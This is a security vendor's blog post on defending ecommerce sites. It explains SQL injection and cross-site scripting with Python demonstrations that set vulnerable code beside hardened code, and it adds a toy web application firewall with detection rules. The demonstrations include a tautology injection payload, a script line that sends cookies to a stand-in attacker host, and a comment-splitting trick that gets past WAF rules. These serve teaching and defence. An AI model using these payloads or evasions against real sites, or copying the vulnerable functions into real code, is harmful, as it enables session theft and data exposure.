
Making Headlines for the Wrong Reason… Don't let it Happen to You.


Written by: Brad Chronister

It even appeared on TMZ.com: one of the world's largest retailers had its website defaced so that it appeared to be selling a grill for cooking babies. Content like that is inappropriate and unacceptable for any retailer to host, which is most likely why major news outlets publicized the defacement so widely. The attackers achieved exactly what they intended: a global company with well-publicized family values was thoroughly embarrassed.


If this happened to one of the largest global retailers, can it happen to you?


In this competitive ecommerce environment, price and availability are everything. The consumer looks for the best price; after all, that's one of the primary benefits of shopping online. We can price shop by simply clicking a link or two. Sometimes we even use applications built to do all the clicking and searching for us, so we get a list of comparative pricing. If your company sells what we are looking for at the price we like, congratulations! You've just made a sale, and making the sale means you've stayed ahead of your competitors.


To get your buyers to this sweet spot, however, your organization needs to keep your website dynamic, and dynamic means change. Unfortunately, attackers love the ecommerce business's need for change, because it often means rushing through development, testing and production (making your website changes "go live").


Web security vulnerabilities can surface during any of the development, test and production phases of a site update. The philosophy of many ecommerce organizations is "we need to get this new product or new pricing out there; we'll deal with the security later." Most times, however, "later" never comes, or it comes too late. Application developers may miss critical steps in writing secure code because of a lack of knowledge or training, or simply because those steps slipped in the rush to get the change onto the website. The testing phase may falter for the same reasons, and code may be deployed into production and out to the world at large because everyone assumes it has already been sufficiently tested for vulnerabilities.


It doesn't matter how large or small your company's ecommerce footprint is, as the defacement suffered by the global retailer mentioned earlier shows. Attackers seek opportunity, and all ecommerce sites present it. Some of the most commonly abused Web vulnerabilities include SQL injection (supplying SQL syntax through a form field or URL parameter so that the database executes it, giving the attacker access to data or functions the application never intended to expose), cross-site scripting (injecting script into a Web page so that it runs in other visitors' browsers, typically to steal sessions or alter what they see) and buffer overflows (writing more data into a fixed-size memory buffer than it can hold, overwriting adjacent memory so the attacker can crash the program or run code of their choosing). Exploiting these vulnerabilities can allow an attacker to steal credit card data, access confidential information or bring your website down. Attackers may instead be more interested in embarrassing the organization, as in the case described earlier, or they may simply be gathering information so they can plan a larger-scale attack later.
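The two vulnerabilities above that arise directly in the kind of code ecommerce teams write every week are SQL injection and cross-site scripting, so here is an added example (not from the original article and not ControlScan's code) showing each in its vulnerable and hardened form. The product catalogue, the "internal" visibility flag and the review-rendering functions are constructed for illustration; the database is an in-memory SQLite table so the example runs offline. Buffer overflows belong to native code and are not shown.

```python
import html
import sqlite3

# Constructed sample catalogue, not real data. The "internal" row stands in for
# unreleased pricing that shoppers should never be able to retrieve.
PRODUCTS = [
    (1, "Gas grill", 299.00, "public"),
    (2, "Charcoal grill", 89.00, "public"),
    (3, "Promo grill", 1.00, "internal"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER, name TEXT, price REAL, visibility TEXT)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", PRODUCTS)
    return conn


def search_vulnerable(conn, term):
    """SQL injection: the shopper's search term is pasted into the statement."""
    sql = (
        "SELECT name, price FROM products "
        "WHERE visibility = 'public' AND name LIKE '%" + term + "%' ORDER BY id"
    )
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Hardened form: the term travels as a bound parameter, never as SQL text."""
    sql = (
        "SELECT name, price FROM products "
        "WHERE visibility = 'public' AND name LIKE ? ORDER BY id"
    )
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def render_review_vulnerable(author, text):
    """Cross-site scripting: user-supplied text is placed into HTML verbatim."""
    return f"<p><b>{author}</b>: {text}</p>"


def render_review_safe(author, text):
    """Hardened form: every untrusted value is HTML-escaped before output."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(text)}</p>"


if __name__ == "__main__":
    conn = make_db()
    # A normal search behaves the same either way.
    print(search_vulnerable(conn, "grill"))
    print(search_safe(conn, "grill"))

    # The closing quote ends the LIKE pattern, "OR 1=1" makes the WHERE clause
    # true for every row (including the internal one), and "--" comments out
    # the rest of the statement. The parameterized query just looks for a
    # product whose name contains that literal string and finds none.
    payload = "%' OR 1=1 --"
    print(search_vulnerable(conn, payload))  # all three rows, internal included
    print(search_safe(conn, payload))        # []

    # A review containing script markup is returned to other shoppers as-is
    # by the vulnerable renderer and as inert text by the safe one.
    review = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
    print(render_review_vulnerable("shopper", review))
    print(render_review_safe("shopper", review))
```

The fix for injection is not input filtering but keeping data and code separate: parameter binding leaves the statement's structure fixed no matter what the shopper types. Likewise, escaping on output (in the renderer, at the point where the value enters HTML) protects every page that displays the value, which a one-off check at the input form cannot.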


The good news is that there are excellent resources available to help reduce risk. One organization in particular, the Open Web Application Security Project (OWASP), publishes resources free of charge to raise awareness of secure coding practices. Its Top Ten list of the most critical Web application security risks, with guidance on how to prevent each one, is available here: https://www.owasp.org/index.php/OWASP_Top_Ten_Project.


The bad news is that even if your organization has followed secure coding development, testing and deployment practices from start to finish, you're still at risk (albeit reduced) from an ever-growing Web vulnerability landscape. Simply put, the attackers have all the time in the world to try to figure out new ways to breach your website and cause havoc—more time, unfortunately, than your application and security teams have.


This is where a Web Application Firewall (WAF) helps. Think of a WAF as a firewall that understands your applications instead of just network traffic: a perimeter firewall decides on addresses and ports, so a SQL injection or cross-site scripting attack arriving on port 443 looks like any other customer's HTTPS request to it, whereas a WAF inspects the content of each HTTP request and response and is intended to stop such an attack in its tracks. In this way the WAF fills in gaps left by human error and by incorrect or inadequate coding practices. Two caveats apply. First, a WAF can only achieve what it is configured and maintained to do: it matches known attack patterns, attackers constantly find ways around stale rules, and rules that are too aggressive will block legitimate customers, so it is critical to keep it tuned and current once deployed. Second, it is a compensating control layered in front of your code, not a replacement for fixing the vulnerabilities your application actually has.
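To make the "inspects the content of the request" and "only as good as its rules" points concrete, here is an added example of the core of a signature-based WAF in miniature. It is not from the original article and is not ControlScan's or any vendor's product: the rule set, the request shape, the field names and the sample requests are all constructed for illustration. It shows a request passing, the two attacks from the earlier example being blocked, and a variant that slips past the first rule set until the normalization step is updated.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical signature set, written in the spirit of the rules a WAF ships
# with: a name for logging and a pattern applied to each decoded field value.
RULES = [
    ("sqli-union", re.compile(r"\bunion\s+select\b", re.I)),
    ("sqli-tautology", re.compile(r"\bor\s+\d+\s*=\s*\d+", re.I)),
    ("xss-script-tag", re.compile(r"<script\b", re.I)),
]


def normalize_v1(value):
    """Decode percent-encoding twice (to unwrap double encoding) and lower-case."""
    return unquote_plus(unquote_plus(value)).lower()


def normalize_v2(value):
    """The v1 step plus removal of SQL inline comments that attackers use to
    split keywords ("UNION/**/SELECT") so that keyword signatures still match."""
    return re.sub(r"/\*.*?\*/", " ", normalize_v1(value))


def inspect(request, rules=RULES, normalize=normalize_v1):
    """Check every query-string and body field of a request (a plain dict
    here, standing in for the parsed HTTP message). Returns the name of the
    first rule that fires and the offending field, or None if allowed."""
    fields = dict(request.get("query", {}))
    fields.update(request.get("body", {}))
    for field, raw in fields.items():
        value = normalize(raw)
        for name, pattern in rules:
            if pattern.search(value):
                return name, field
    return None


if __name__ == "__main__":
    # Constructed requests: a normal search, the tautology injection, a
    # percent-encoded script tag in a review, and a comment-split UNION.
    normal = {"query": {"q": "grill"}}
    sqli = {"query": {"q": "%' OR 1=1 --"}}
    xss = {"body": {"review": "%3Cscript%3Ealert(1)%3C/script%3E"}}
    evasive = {"query": {"q": "x' UNION/**/SELECT name, price FROM products --"}}

    for req in (normal, sqli, xss, evasive):
        print(inspect(req))                           # v1 misses the last one
    print(inspect(evasive, normalize=normalize_v2))   # v2 catches it
```

The evasive request is the whole argument for maintenance in one line: the database accepts `UNION/**/SELECT` as readily as `UNION SELECT`, but a rule set that only knows the second form waves it through until someone updates the normalization. The parameterized query from the earlier example would have shrugged off all of these regardless, which is why the WAF belongs in front of secure code rather than in place of it.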


If you're considering employing a WAF but simply don't have the time or skill set to manage it, you may want to outsource the task to a Managed Security Services Provider (MSSP).  MSSPs specialize in delivering the technical expertise and security know-how required to keep your business secure, making it simple and affordable for you to receive enterprise-grade security.


Learning from attacks suffered by other organizations helps, but that knowledge can only take you so far. New Web application vulnerabilities surface regularly. Are you prepared to safeguard your business from risk? To learn how a WAF might help your business, or if you'd simply like to ask questions about your business's security in general, give ControlScan a call at 1-800-825-3301 x 3. We'd be happy to help.